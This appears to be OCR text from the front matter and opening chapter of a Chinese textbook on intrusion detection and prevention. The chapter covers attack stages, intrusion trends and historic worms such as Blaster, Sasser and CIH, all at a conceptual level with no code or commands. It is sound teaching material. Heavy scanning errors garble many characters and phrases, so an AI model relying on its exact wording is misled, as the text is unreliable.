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本 书 共 分 4 章 。 首 先 介绍 网 络 人 侵 的 基本 概念 及 典型 方法 ,以 及 典型 的 网 络 人 侵 事 件 ;接着 介绍 人 
侵 检测 的 基本 概念 、 分 类 ,入侵 检测 系统 的 基本 模型 .工作 模式 .部署 方式 ,其 中 重点 讲解 了 人 侵 检 测 信 
息 收 集 .信息 分 析 ,告警 与 响应 3 个 过 程 ; 然 后 介绍 人 侵 防 御 的 定义 .分 类 以 及 与 人 侵 检 测 的 区 别 , 和 人 侵 
防御 系统 的 功能 .原理 与 部 署 .关键 技术 ;最 后 介绍 人 侵 检 测 和 和 人 侵 防 御 的 典型 应 用 案例 ,并 结合 详细 案 
例 对 需求 和 解决 方案 进行 详细 分 析 解 读 ,帮助 读者 更 牢固 地 掌握 网 络 人 侵 及 其 检测 和 防御 知识 。 

本 书 每 章 后 均 附 有 思考 题 总 结 该 章 知 识 点 ,以 便 为 读者 的 进一步 阅读 提供 思路 。 
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网 络 安全 运 维 的 网 络 管理 人 员 和 对 网 络 空间 安全 感 兴趣 的 读者 的 基础 读物 。 
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出 大 砚 明 一 


21 世纪 是 信息 时 代 , 信 息 已 成 为 社会 发 展 的 重要 战略 资源 ,社会 的 信息 
化 已 成 为 当今 世界 发 展 的 潮流 和 核心 ,而 信息 安全 在 信息 社会 中 将 扮演 极为 
重要 的 角色 , 它 会 直接 关系 到 国家 安全 、 企 业经 营 和 人 们 的 日 党 生活。 随 着 
信息 安全 产业 的 快速 发 展 ,全 球 对 信息 安全 人 才 的 需求 量 不 断 增 加 ,但 我 国 
日 前 信息 安全 人 才 极 度 匮乏 , 远 远 不 能 满足 金融 .商业 ,公安 、 军 事 和 政府 等 
部 门 的 需求 。 要 解决 供需 矛盾 ,必须 加 快 信息 安全 人 才 的 培养 ,以 满足 社会 
对 信息 安全 人 才 的 需求 。 为 此 ,教育 部 继 2001 年 批准 在 武汉 大 学 开设 信息 
安全 本 科 专 业 之 后 ,又 批准 了 多 所 高 等 院 校 设立 信息 安全 本 科 专 业 , 而 且 许 
多 高 校 和 科研 院 所 已 设立 了 信息 安全 方 癌 的 具有 硕士 和 博士 学 位 授予 权 的 
学 科 点 。 

信息 安全 是 计算 机 、 通信、 物理 .数学 等 领域 的 交叉 学 科 , 对 于 这 一 新 兴 
学 科 的 培养 模式 和 访 程 设置 ,各 高 校 普遍 缺乏 经 验 , 因 此 中 国 计 算 机 学 会 教 
育 专 业 委 员 会 和 清华 大 学 出 版 社 联合 主办 了 “信息 安全 专业 教育 教学 研讨 
会 "等 一 系列 研讨 活动 ,并 成 立 六 高 等 院 校 信 息 安全 专业 系列 教材 ?编审 委员 
会 ,由 我 国信 息 安 全 领域 著名 专家 省 国 镇 教授 担任 编 委 会 主任 ,指导 “局 等 院 校 
信息 安全 专业 系列 教材 ”的 编写 工作 。 编 委 会 本 着 人 研究 先行 的 指导 原则 ,认真 
人 研讨 国内 外 高 等 院 校 信息 安全 专业 的 教学 体系 和 课程 设置 ,进行 了 大 量具 有 前 
脆性 的 研究 工作 ,而 且 这 种 研究 工作 将 随 看 我 国信 息 安全 专业 的 发 展 不 断 深 
和信。 系列 教材 的 作者 部 是 既 在 本 专业 领域 有 深厚 的 学 术 造 讶 ,又 在 教学 第 一 线 
有 丰 亩 的 教学 经 验 的 学 者 ,专家 。 

该 系列 教材 是 我 国 第 一 套 专门 针对 信息 安全 专业 的 教材 ,其 特点 是 : 

中 体系 完整 结构 合理 ,内 容 先 进 。 

多 适应 面 广 : 能 够 满足 信息 安全 、 计 算 机 、 通 信 工 程 等 相关 专业 对 信息 

立体 配套 ; 除 主教 材 外 ,还 配 有 多 媒体 电子 教案 .习题 与 实 验 指 导 等 。 

版 本 更 新 及 时 , 紧 跟 科学 技术 的 新 发 展 。 

在 全 力 做 好 本 版 教材 ,满足 学 生 用 书 的 基础 上 ,还 经 由 专家 的 推荐 和 审 
定 ,六 选 了 一 批 国外 信息 安全 领域 优秀 的 教材 加 入 系列 教材 中 ,以 进一步 满 
足 大 家 对 外 版 书 的 需求 。“ 商 等 院 校 信息 安全 专业 系列 教材 "已 于 2006 年 年 
初 正 式 列 入 普通 高 等 教育 “十 一 五 ”国家 级 教材 规划 。 

2007 年 6 月 ,教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 成 立 大 会 


入 侵 检 测 与 入 侵 防 逢 


暨 第 一 次 会 议 在 北京 胜利 召开 。 本 次 会 议 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委 
员 会 主任 单位 北京 工业 大 学 和 北京 电子 科技 学 院 主 办 ,清华 大 学 出 版 社 协 办 。 教 育 部 高 
等 学 校 信 息 安 全 类 专业 教学 指导 委员 会 的 成 立 对 我 国信 息 安 全 专业 的 发 展 起 到 重要 的 指 
导 和 推动 作用 。2006 年 教育 部 给 武汉 大 学 下 达 了 “信息 安全 专业 指导 性 专业 规范 人 研制 ” 
的 教学 科研 项 目 。2007 年 起 该 项 目 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 
组 织 实施 。 在 高 教 司 和 教 指 委 的 指导 下 ,项 目 组 团结 一 致 ,努力 工作 ,克服 困难 ,历时 5 
年 ,制定 出 我 国 第 一 个 信息 安全 专业 指导 性 专业 规范 ,于 2012 年 年 底 通 过 经 教育 部 高 等 
教育 司 理工 科教 育 处 授权 组 织 的 专家 组 评审 ,并 且 已 经 得 到 武汉 大 学 等 许多 高 校 的 实际 
使 用 。2013 年 ,新 一 届 教 育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 成 立 。 经 组 织 审查 
和 研究 决定 ,2014 年 以 教育 部 高 等 学 校 信 息 安 全 专业 教学 指导 委员 会 的 名 义 正式 发 布 
《高 等 学 校 信息 安全 专业 指导 性 专业 规范 》( 由 清华 大 学 出 版 社 正式 出 版 )。 

2015 年 6 月 ,国务院 学 位 委员 会 .教育 部 出 台 增 设 “ 网 络 空 间 安 全 ”为 一 级 学 科 的 决 
定 ,将 高 校 培 养 网 络 空间 安全 人 才 提 到 新 的 高 度 。2016 年 6 月 ,中 央 网 络 安全 和 信息 化 
领导 小 组 办 公 室 (下 文 简称 中 央 网 信 办 )、 国 家 发 展 和 改革 委员 会 .教育 部 .科学 技术 部 、 工 
业 和 信息 化 部 及 人 力 资 源 和 社会 保障 部 六 大 部 门 联合 发 布 4 关 于 加 强 网 络 安全 学 科 建 设 
和 人 才 培 养 的 意见 》( 中 网 办 发 文 [2016]4 号 ) 。2019 年 6 月 ,教育 部 高 等 学 校 网 络 空间 安 
全 专业 教学 指导 委员 会 召开 成 立 大 会 。 为 贯彻 落实 《关于 加 强 网 络 安全 学 科 建 设 和 人 才 
dl a A 促进 网 络 安全 学 科 专 业 建 设 和 人 才 培 养 , 促 

进 网 络 空间 安全 相关 核心 课程 和 教材 建设 ,在 教育 部 高 等 学 校 网 络 空 间 安全 专业 教学 指 
导 委员 会 和 中 央 网 信 办 资助 的 网 络 空 s 间 安全 教材 建设 课题 组 的 指导 下 ,启动 了 “网 络 空间 
安全 重点 规划 从 书 ” 的 工作 ,由 教育 部 高 等 学 校 网 络 空间 安全 专业 教学 指导 委员 会 秘书 长 
封 化 民 教 授 担任 编 委 会 主任 。 本 规划 丛书 基于 “高 等 院 校 信息 安全 专业 系列 教材 ?坚实 的 
工作 基础 和 成 果 、 阵 容 强 大 的 编审 委员 会 和 优秀 的 作者 队伍 ,目前 已 经 有 多 本 图 书 获 得 教 
育 部 和 中 央 网 信 办 等 机 构 评 选 的 “普通 高 等 教育 本 科 国 家 级 规划 教材 ”普通 高 等 教育 精 
品 教材 “中 国 大 学 出 版 社 图 书 奖 ”" 和 “国家 网 络 安全 优秀 教材 奖 ” 等 多 个 奖项 ，。 

“网 络 空间 安全 重点 规划 从 书 ” 将 根据 《高 等 学 校 信息 安全 专业 指导 性 专业 规范 》( 及 
后 续 版 本 ) 和 相关 教材 建设 课题 组 的 研究 成 果 不 断 更 新 和 扩展 ,进一步 体现 科学 性 .系统 
性 和 新 颖 性 ,及 时 反映 教学 改革 和 课程 建设 的 新 成 果 , 并 随 着 我 国 网 络 空间 安全 学 科 的 发 
展 不 断 完 善 ,力争 为 我 国 网 络 空间 安全 相关 学 科 专 业 的 本 科 和 研究 生 教 材 建设 .学 术 出 版 
与 人 才 培 养 做 出 更 大 的 贡献 。 

我 们 的 E-mail 地 址 是 : zhangm(@tup. tsinghua. edu. cn ,联系 人 : 张 民 。 


“网 络 空间 安全 重点 规划 丛书 ”编审 委员 会 
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没有 网 络 安 全 ,就 没有 国家 安全 ;没有 网 络 安全 人 才 ,就 没有 网 络 安全 ，。 

为 了 更 多 .更 快 .更 好 地 培养 网 络 安全 人 才 , 许 多 学 校 都 在 加 大 投入 , 聘 
请 优秀 教师 ,招收 优秀 学 生 ,建设 一 流 的 网 络 空间 安全 专业 。 

网 络 空间 安全 专业 建设 需要 体系 化 的 培养 方案 .系统 化 的 专业 教材 和 专 
业 化 的 师资 队伍 。 优 秀 教 材 是 培养 网 络 空间 安全 专业 人 才 的 关键 。 但 是 ,这 
却 是 一 项 十 分 艰巨 的 任务 。 原 因 有 两 个 : 其 一 ,网 络 空间 安全 的 涉及 面 非常 
广 , 至 少 包括 密码 学 、 数 学 ,计算 机 ,通信 工程 等 多 门 学 科 , 因 此 其 知识 体系 庞 
杂 难以 梳理 ;其 二 ,网 络 空间 安全 的 实践 性 很 强 ,技术 发 展 更 新 非常 快 , 对 环 
境 和 师资 要 求 也 很 高 。 

“人 侵 检 测 与 人 侵 防 御 ? 是 网 络 空间 安全 和 信息 安全 专业 的 基础 课程 , 通 
过 和 人 侵 检 测 与 人 侵 防 御 各 知识 面 的 介绍 ,掌握 人 侵 检 测 与 人 侵 防 御 技术 及 其 
应 用 。 本 书 涉 及 的 知识 面 宽 , 共 分 4 章 : 第 1 章 介 绍 网络 人 侵 ; 第 2 章 介 绍 
人 和信 侵 检测 ;第 3 章 介 绍 人 侵 防 御 ; 第 4 章 介 绍 典 型 案例 。 

本 书 既 适合 作为 网 络 空间 安全 ,信息 安全 及 相关 专业 学 生 的 课程 教材 和 
参考 资料 ,也 适合 网 络 安全 研究 人 员 作 为 网 络 空间 安全 的 入 门 基础 读物 。 随 
着 新 技术 的 不 断 发 展 ,今后 将 不 断 更 新 图 书 内 容 。 

由 于 作者 水 平 有 限 , 书 中 难免 存在 玖 涯 和 不 妥 之 处 ,欢迎 读者 批评 指正 。 


作 者 
2019 年 7 月 
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网 络 入 侵 


1 1 网 络 入 侵 的 基本 概念 


计算 机 发 展 初期 ,计算 机 本 号 就 充满 神秘 怀 , 而 那些 特别 撞 长 计算 机 技术 的 人 更 让 人 
感到 神秘 ,人 们 习惯 于 把 痴迷 于 计算 机 技术 和 计算 机 编程 的 计算 机 爱好 者 称 为 黑客 。 随 
着 计算 机 网 络 技术 的 发 展 和 普及 ,现在 人 们 习惯 于 把 “恶意 用 户 “ 网 络 攻 击 者 “非法 入 侵 
首 "等 概念 混淆 在 一 起 ,把 他 们 统称 为 黑客 。 网 络 人 侵 常见 的 定义 是 : 具有 熟练 的 编写 和 
调试 计算 机 程序 的 技巧 的 人 ,使 用 这 些 技巧 获得 非法 或 未 授权 的 网 络 或 文件 访问 ,入 侵 进 
入 公司 内 部 网 的 行为 。 

早先 ,人 们 通 第 把 非 授 权 情 况 下 访问 计算 机 的 行为 称 为 破解 ,而 把 熟练 掌握 和 运用 这 
种 技术 的 人 称 为 黑客 。 随 着 时 间 的 推移 ,媒体 宣传 导致 黑客 变 成 人 侵 的 含义 。 现 在 黑客 
则 被 作为 诸如 Linux Torvald(Linux 之 父 ) Tim Berners-Lee( 现 代 WWW 之 父 ) 及 从 塞 
网 络 信息 等 犯罪 者 的 同义词 。 

在 现实 生活 中 ,技术 往往 是 相通 的 ,而 无 穷 的 变化 来 源 于 人 的 思维 ,网 络 入 侵 也 不 例 
外 。 绝 大 多 数 的 网 络 人 侵 不 一 定 需要 局 闪 的 技术 ,十 几 光 的 中 学 生 束 可 以 渗透 企业 内 部 
网 络 ,甚至 政府 或 金融 内 部 网 络 。 并 非 这 些 网 络 人 侵 者 都 是 天 才 ,而 是 因为 日 前 的 计算 机 
网 络 防御 系统 相对 不 完善 ,或 者 安全 管理 湾 绸 的 绿 故 。 

目前 ,因特网 采用 的 TCP/VIP 是 早期 为 科学 研究 而 设计 的 ,设计 之 初 并 没有 考虑 到 网 
络 信任 和 信息 安全 的 因素 ,早期 的 操作 系统 注重 功能 ,也 忽略 了 安全 问题 。 这 些 因 系 都 成 
为 网 络 人 侵 痢 滋生 的 土壤 ,再 加 上 蠕虫 病毒 的 沁 造 和 蠕虫 的 智能 化 攻击 ,网 络 人 侵 对 人 们 
的 困扰 日 益 突 出 。 人 们 在 使 用 网 络 的 同时 不 得 不 人 妃 有 党 网 络 人 侵 的 困扰 。 在 当前 的 网 络 环 
境 下 ,要 想 实 现 一 个 相对 安全 的 网 络 环境 ,必须 经 过 网 络 技术 的 研究 者 .管理 者 和 使 用 者 
的 不 懈 努 力 和 改进 。 


111 网 络 入 侵 的 对 和 象 


网 络 入 侵 的 对 象 包括 计算 机 或 网 络 中 的 逻辑 实体 和 物理 实体 ,分 为 服务 器 、 安 全 设 
备 、 网 络 设备 ,数据 信息 、 进 程 和 应 用 系统 。 

服务 项: 指 网 络 上 对 外 提供 服务 的 市 点 、 服 务 间 中 的 服务 端 软件 及 其 操作 系统 等 ,如 
WWW .FTP、Telnet、E- 邮 件 ,DNS., Real 等 和 常见 网 络 服 务 帮 软件 ; Oracle、 Sybase、 In- 
formix、MySQL .SQL 等 数据 库 服 务 硕 以 及 Windows NT/2000、Linux、 Solaris、Hpux、 
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IRIX、AIX、SCO、BSD 等 操作 系统 。 


安全 设备 : 指 防火 场 IDS、 陷 阶 、 取 证 . 扫 摘 、 抗 毁 `.VPN 、 隅 离 设 备 等 提供 安全 防护 
功能 的 相关 设备 。 

网 络 设备 : 指 网 络 建设 使 用 的 关键 网 络 或 扩展 设备 和 线路 ,如 路 由 需 、 桥 接 需 、 
ModemPool 等 网 络 接 和 设备 和 交换 机 、 集 线 禹 等 网 络 扩 展 设备 。 

数据 信息 : 指 在 各 网 络 节 点 设备 中 存放 或 对 外 提供 服务 的 网 络 上 流动 的 数据 信息 ， 


如 产品 信息 、 财 务 信息 、 机 密 文 件 。 


进程 : 是 一 个 具有 独立 功能 的 程序 ,也 是 关于 某 个 数据 集合 的 一 次 可 以 并 发 执行 的 
运行 活动 。 进 程 作为 构成 系统 的 基本 元 素 , 不 仅 是 系统 内 部 独立 运行 的 实体 ,而 且 是 独立 
竞争 资源 的 基本 实体 。 

应 用 系统 ; 指 各 业务 流程 运作 的 电子 支撑 系统 或 专用 应 用 系统 。 

1L12 网 络 入 侵 的 一 般 流 程 


网 络 入 侵 是 一 项 系统 性 很 哩 的 工作 ,攻击 者 往往 宕 要 花费 大 量 时 间 和 精力 进行 充分 


图 1-1 


信息 收集 


分 析 系 统 的 
安全 漏洞 


柑 拟 攻击 


改变 日 志 、 
清除 痕迹 


网 络 攻击 流程 图 


的 准备 ,才能 侵入 他 人 的 计算 机 系统 。 尽 管 攻击 的 
目标 不 同 , 但 是 攻击 者 采用 的 攻击 方式 和 手段 却 有 
一 定 的 共同 性 。 一 般 释 客 的 攻击 采 略 可 以 概 丘 为 : 
信息 收集 .分 析 系 统 的 安全 独 洞 ,模拟 攻击 、 实 施 攻 
击 改变 日 志 、 清 除 痕迹 。 网 络 攻击 流程 图 如 图 1-] 
所 示 。 


1 信息 收集 

信息 收集 的 目的 是 为 了 进入 所 要 攻击 的 目标 网 
络 的 数据 库 。 攻 击 者 会 利用 下 列 公 开 协 议 或 工具 收 
集 驻 留 在 网 络 系统 中 日 标 机 的 IP 地 址 、 操 作 系 统 类 
型 和 版 本 、 系 统管 理 人 员 的 邮件 地 址 每 ,根据 这 些 信 
县 进行 分 析 , 从 而 了 解 被 攻击 方 系统 可 能 存在 的 


2 分 析 系 统 的 安全 漏洞 


收集 到 攻击 目标 的 有 关 网 络 信息 之 后 ,起 客 会 探测 网 络 上 的 每 台 主 机 ,以 寻求 该 系统 


的 安全 淖 洞 或 安全 罚 点 ,墨客 可 能 使 用 月 编程 序 或 利用 公开 的 工具 两 种 方式 日 动 扫描 驻 
留 在 网 络 上 的 主机 。 


3 模拟 攻击 

根据 第 一 步 获得 的 信息 建立 模拟 环境 ,然后 对 模拟 目标 机 进行 一 系列 攻击 ,测试 对 方 
可 能 的 反应 。 通 过 检查 被 攻击 方 的 日 志 , 可 以 了 解 攻 击 过 程 中 留 下 的 “痕迹 ”。 这 样 ,攻击 
者 就 知道 宕 要 删除 哪些 文件 毁灭 其 和信 侵 证 据 。 
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4 实施 攻击 

黑客 使 用 上 述 方法 收集 或 探测 到 一 些 * 有 用 ”信息 之 后 ,可 能 会 对 上 日 标 系统 实施 攻击 。 
通过 猜测 程序 可 对 截获 的 用 户 账号 和 口令 进行 破译 ,利用 破译 程序 可 对 截获 的 系统 密码 
文件 进行 破 详 ,利用 网 络 .系统 本 刁 的 清 弱 环节 和 安全 漏洞 可 实施 电子 引诱 ,如 安放 特 洛 
伊 木马 等 。 大 多 数 攻 击 郡 利用 了 系统 软件 本 映 的 潮 洞 , 通 篆 是 利用 缓冲 区 洲 出 漏洞 获得 
非法 权限 。 在 该 阶段 ,入 侵 者 会 试图 扩大 一 个 特定 系统 上 已 有 的 泼 洞 ,如 试图 发 现 一 个 
set-uid 根 脚 本 ,以便 获取 根 访问 权 。 获 得 一 定 权 限 后 ,进一步 发 现 受 损 系 统 在 网 络 中 的 
信任 等 级 ,进而 以 该 系统 为 跳板 展开 对 整个 网 络 的 攻击 。 


5 改变 日 志 、 清 除 痕迹 

由 于 攻击 者 的 所 有 活动 一 般 都 会 被 系统 日 志 记 录 在 案 ,为 避免 被 系统 管理 员 发 现 , 攻 
击 者 都 试图 毁 掉 攻击 人 侵 的 痕迹 。 攻 击 者 还 会 在 受 损 系 统 上 建立 新 的 安全 漏洞 或 后 门 ， 
以 便 在 先前 的 攻击 点 被 发 现 之 后 继续 访问 该 系统 。 


113 网 络 入 侵 方 法 分 析 


网 络 信 侵 者 之 所 以 能 够 渗入 主机 系统 和 对 网 络 实施 攻击 ,从 内 因 来 讲 , 主 要 因为 主机 
系统 和 网 络 协议 存在 春 漏洞 ,从 外 因 来 讲 , 原 因 有 很 多 ,如 人 类 与 生 俱 来 的 好 奇 心 等 ,最 主 
要 的 是 个 人 ,企业 ,其 至 国家 的 利益 在 网 络 和 互联 网 中 的 体现 ,利益 的 驱动 使 得 因特网 中 
的 黑客 数量 激增 。 

安全 威胁 的 表现 形式 有 很 多 种 ,可 以 简单 到 仅 干扰 网 络 正常 的 运作 (通常 把 这 种 攻击 
称 为 拒绝 服务 攻击 ,简称 DoS 攻击 ), 也 可 以 复杂 到 对 选 定 的 目标 主动 进行 攻击 修改 或 
控制 网 络 质 源 。 和 有 见 的 安全 威胁 包括 : 口令 破解 .漏洞 攻击 、 特洛伊 木马 攻击 、IP 地 址 其 
骗 、 网 络 监 听 病毒 攻击 .社会 工程 攻击 等 。 通 常情 况 下 ,上 述 的 安全 威胁 并 不 是 单独 存在 
的 ,实际 上 ,大 多 数 成 功 的 攻击 都 是 结合 了 了 上述 几 种 威胁 完成 的 。 例 如 ,缓冲 区 溢出 攻击 
破坏 了 正常 的 服务 ,但 破坏 运行 的 目的 是 执行 未 授权 的 或 危险 的 代码 ,从 而 使 恶意 用 户 可 
以 控制 目标 服务 融 。 现 实 中 ,网 络 威胁 的 种 类 很 多 ,手法 也 干 变 万 化 ,主要 的 入 侵 攻 击 方 
法 如 图 1-2 所 示 。 


L14 网 络 入 侵 的 发 展 趋势 


1 网 络 入 侵 的 自动 化 程度 和 入 侵 速 度 不 断 提 高 

自动 化 攻击 在 攻击 的 每 个 阶段 都 会 发 生 新 的 变化 。 在 扫描 阶段 ,扫描 工具 的 发 展 使 
得 黑客 能 够 利用 更 先进 的 扫描 模式 改善 扫描 效果 ,提高 扫描 速度 ;在 渗透 控制 阶段 ,安全 
防护 脆弱 的 系统 更 容易 受到 损害 ;攻击 传播 技术 的 发 展 使 得 以 前 需要 依靠 人 工 启 动 软件 
工具 发 起 的 攻击 ,发 展 到 攻击 工具 可 以 自 启动 发 动 新 的 攻击 ;在 攻击 工具 的 协调 管理 方 
面 , 随 着 分 布 式 攻击 工具 的 出 现 ,黑客 可 以 很 容易 地 控制 和 协调 分 布 在 Internet 上 的 大 量 
已 部 和音 的 攻击 工具 。 

2 入 侵 工 具 越 来 越 复 杂 

攻击 工具 的 开发 者 正在 利用 更 先进 的 技术 武装 攻击 工具 ,攻击 工具 的 特征 比 以 前 更 
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1-2 主要 的 入 侵 攻击 方法 


难 发 现 , 已 经 具备 了 肥 侦 破 \ 动 态 行 为 .更 加 成 熟 等 特点 。 肥 俱 破 是 指 震 客 越 来 越 多 地 来 
用 具有 隐蔽 攻击 工具 特性 的 技术 ,使 安全 专家 需要 耗费 更 多 的 时 间 分 析 新 出 现 的 攻击 工 
具 和 了 解 新 的 攻击 行为 。 动 态 行 为 是 指 现在 的 目 动 攻击 工具 可 以 根据 随机 选择 .预先 定 
义 的 决策 路 径 或 通过 入 侵 者 耳 接管 理 变 化 其 攻击 模式 和 行为 ,而 不 是 像 早期 的 攻击 工具 
仅 能 够 以 单一 确定 的 顺序 执行 攻击 步 又 。 更 加 成 熟 是 指 攻 击 工具 已 经 发 展 到 可 以 通过 升 
级 或 更 换 工 具 的 部 分 模块 进行 扩展 ,进而 发 动 迅 速 变 化 的 攻击 , 且 在 每 一 次 攻击 中 会 出 现 
多 种 不 同形 态 的 攻击 工具 ;同时 ,在 实施 攻击 的 时 候 , 许 多 常见 的 攻击 工具 使 用 了 如 IRC 
或 HTTP 等 协议 ,从 攻击 者 处 向 被 攻击 计算 机 发 送 数据 或 命令 ,使 得 区 别 正常 、 合 法 的 网 
络 传输 流 与 攻击 信息 流 变 得 越 来 越 困 难 。 

3 洒 客 利用 安全 漏洞 的 速度 越 来 越 快 

新 发 现 的 各 种 安全 源 洞 每 年 部 要 增加 一 售 , 每 年 部 会 发 现 安全 汤 洞 的 新 类 型 ,网 络 管 
Ee Ai 


4 防火 墙 被 攻击 者 渗透 的 情况 越 来 越 多 

配置 防火 墙 目 前 仍然 是 防范 网 络 攻击 的 主要 保护 措施 。 但 是 ,现在 出 现 越 来 越 多 的 
攻击 技术 ,可 以 实现 绕 过 防火 墙 的 攻击 。 例 如 ,黑客 可 以 利用 Internet 打印 协议 IPP 和 基 
于 Web 的 分 布 式 攻击 纸 过 防火 场 实 施 攻击 。 

5 安全 威胁 的 不 对 称 性 增加 

Internet 网 上 的 安全 是 相互 依赖 的 ,每 台 与 Internet 网 连接 的 计算 机 遭受 攻击 的 可 
能 性 与 连接 到 全 球 Internet 网 上 其 他 计算 机 系统 的 安全 状态 直接 相关 。 由 于 攻击 技术 的 
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进步 ,攻击 者 可 以 较 容易 地 利用 分 布 式 系统 ,对 受害 者 发 动 破 坏 性 攻击 。 随 着 黑客 软件 部 
普 目 动 化 程度 和 攻击 工具 管理 扩 马 的 捉 疝 ,安全 威胁 的 不 对 称 性 将 继续 增加 。 


6 攻击 网 络 基础 设施 产生 的 破坏 作用 越 来 越 大 

由 于 用 户 越 来 越 多 地 依赖 计算 机 网 络 提供 各 种 服务 ,完成 日 营业 务 ,刺客 攻击 网 络 基 
础 设施 造成 的 破坏 影响 越 来 越 大 。 黑 客 对 网 络 基础 设施 的 攻击 ,主要 手段 有 分 布 式 拒绝 
服务 攻击 .蠕虫 病毒 攻击 、. 对 Internet 域名 系统 (DNS) 的 攻击 和 对 路 由 器 的 攻击 。 分 布 式 
拒绝 服务 攻击 是 攻击 者 操纵 多 人 台 计 算 机 系统 攻击 一 个 或 多 个 受害 系统 ,导致 被 攻击 系统 
拒绝 四 其 合法 用 户 提供 服务 。 里 虫 病 毒 是 一 种 目 我 可 殖 的 恶意 代码 ,与 需要 被 感染 计算 
机 进行 示 种 动作 才 触 发 驮 殖 功能 的 普通 计算 机 病毒 不 同 , 奸 里 病毒 能 够 利用 大 量 系统 安 
全 源 洞 进行 目 我 色 殖 ,客人 致 大 量 计算 机 系统 在 几 个 小 时 内 受到 攻击 。 对 DNS 的 攻击 包括 
伪造 DNS 缓存 信息 (DNS 缓存 区 中 毒 )、 破 坏 修改 提 代 给 用 户 的 DNS 数据 .迫使 DNS 拒 
绝 服务 等 。 对 路 由 天 的 攻击 包括 修改 .删除 全 球 Internet 的 路 由 表 ,使 得 应 该 发 送 到 一 个 
网 络 的 信息 流 改 回 传送 到 万 一 个 网 络 , 从 而 造成 对 两 个 网 络 的 拒绝 服务 攻击 。 


123 网 络 入 侵 的 典型 方法 


121 病毒 木马 


恶意 软件 又 称 恶 意 程序 ,一般 包括 病毒 和 木马 两 方面 。 前 者 通 凋 具 有 一 定 的 显 性 破 
坏 性 ,后 者 则 更 倾向 于 在 没有 被 用 户 察 党 的 情况 下 物 取 信息。 在 实践 中 ,我们 往往 很 难 将 
二 省 严格 区 分 开 。 有 些 病 毒 也 市 有 木马 特征 ,有 些 木 己 也 会 市 有 病毒 特征 。 


1 病毒 

病毒 是 指 编制 或 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 数据 的 ,可 以 自我 复制 的 
一 组 计算 机 指令 或 程序 代码 。 

早期 的 病毒 大 多 是 黑客 的 作品 ,单纯 以 破坏 为 目的 ,门客 们 为 了 烃 技 和 引起 社会 关注 
制作 并 传播 这 类 病毒 ,一 般 并 不 包含 任何 经 济 企图 。 如 今 挂 有 这 类 目的 发 动 攻击 的 黑客 
己 经 越 来 越 少 了 ,大 多 数 病 毒 在 搞 破 坏 的 同时 ,往往 会 有 盗 甸 、 勒 夫 等 经 济 目 的 。 

攻击 者 可 通过 网 页 .邮件 等 传播 计算 机 病毒 ,对 计算 机 系统 进行 破坏 ,如 破坏 或 删除 
文件 ,将 硬盘 格 去 化 以 及 进行 拒绝 服务 等 攻击 。 这 类 病毒 的 代表 有 冲击 波 、 震 功 波 、 
[二 

1) 冲击 波 

冲击 波 蠕 虫 (Worm. Blaster 或 Lovesan ,也 详 为 “疾风 病毒 ”是 一 种 散播 于 Microsoft 
操作 系统 、Windows XP 与 Windows 2000 的 晴 虫 病毒 ,爆发 于 2003 年 8 月 。 此 蠕虫 第 一 
次 被 注意 到 是 在 2003 年 的 8 月 11 日 。 它 不 断 紧 殖 并 感染 ,在 8 月 13 日 达到 高 峰 ,之 后 
借助 ISP( 互 联网 服务 提供 商 ) 与 网 络 上 散布 的 治疗 方法 ,病毒 扩散 得 到 了 抑制 。2003 年 
8 月 29 日 ,一 个 来 和 月 美国 明 尼 办 达州 的 18 岁 年 轻 人 Jeffrey Lee Parson 由 于 创造 了 
Blaster. B 变种 而 被 逮捕 ,他 在 2005 年 被 判处 18 个 月 的 有 期 徒刑 。 
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该 蠕虫 会 不 停 地 利用 IP 扫 摘 技术 寻找 网 络 上 系统 为 Windows 2000 或 Windows XP 
的 计算 机 ,找到 后 就 利用 DCOM RPC 缓冲 区 漏洞 攻击 该 系统 ,一 旦 攻击 成 功 ,病毒 体 将 
会 被 传送 到 对 方 计 算 机 中 进行 感染 ,使 系统 操作 异 稼 .不 停 地 倒计时 重 司 ,甚至 导致 系统 
朋 沉 。 男 外 ,该 病毒 还 会 对 微软 的 一 个 升级 网 站 进行 拒绝 服务 攻击 ,导致 该 网 站 堵塞 ,使 
用 户 无 法 通过 该 网 站 升级 系统 。2003 年 8 月 16 日 以 后 ,该 病毒 还 会 使 被 攻击 的 系统 形 
失 更 新 该 漏洞 补丁 的 能 力 。 据 微软 2004 年 官方 发 布 的 数据 显示 ,全球 至 少 800 万 台 计 算 
机 遭 到 了 冲击 波 病 毒 的 感染 ，。 

2) 震荡 波 

2004 年 5 月 1 日 ,震荡 波 (Worm. Sasser) 开 始 在 互联 网 肆虐 。 该 病毒 利用 Windows 
平台 的 Lsass 泪 洞 进行 传播 ,中 招 后 的 系统 将 开局 128 个 线程 攻击 其 他 网 上 的 用 户 ,可 造 
成 机 带 运 行 缓慢 、 网 络 堵塞 ,并 让 系统 不 停 进行 倒计时 重 局 。 

震 沪 波 病 毒 在 全 球 感 染 了 数 折 万 计算 机 ,受害 者 中 不 乏 喘 国 海关 警卫 队 、 欧 盟 高盛 
以 及 澳大利亚 Westpac 银行 这 样 的 知名 公司 或 机 构 。 很 多 安全 公司 认为 ,震荡 波 是 计算 
机 历史 上 最 具 破 坏 力 的 病毒 。 

“震荡 波 ” 是 德国 一 名 高 中 生 编 写 的 ,他 在 18 岁 生 日 那天 释放 了 这 个 病毒 。 德 国 一 家 
法 庭 认定 他 从 事 计算 机 破坏 活动 ,但 由 于 编写 这 些 代 码 的 时 候 他 还 是 一 个 未 成 年 人 ,因此 
仅 判 了 缓刑 。 

AE 

CIH 病毒 是 一 种 能 够 破坏 计算 机 系统 便 件 的 恶性 病毒 ,1998 年 6 月 开始 出 现 ,是 一 
位 名 叫 陈 僵 豪 的 大 学 生 编 写 的 。CIH 的 载体 是 一 个 名 为 “ICQ 中 文 Ch_at 模块 ”的 工具 ， 
并 以 热门 盗版 光盘 游戏 (如 “ 古 莫 奇兵 ”或 Windows 95/98) 为 媒介 ,经 互联 网 各 网 站 互相 
转载 ,使 其 迅速 传播 。 

CIH 属 亚 性 病毒 , 当 其 发 作 条 件 成 熟 时 ,会 破坏 人 硬盘 数据 ,同时 有 可 能 破坏 BIOS 程 
序 。 其 具体 发 作 特征 为 : 以 2048 个 忆 区 为 单位 ,从 硬盘 主 引 导 区 开始 依次 往 硬盘 中 写 入 
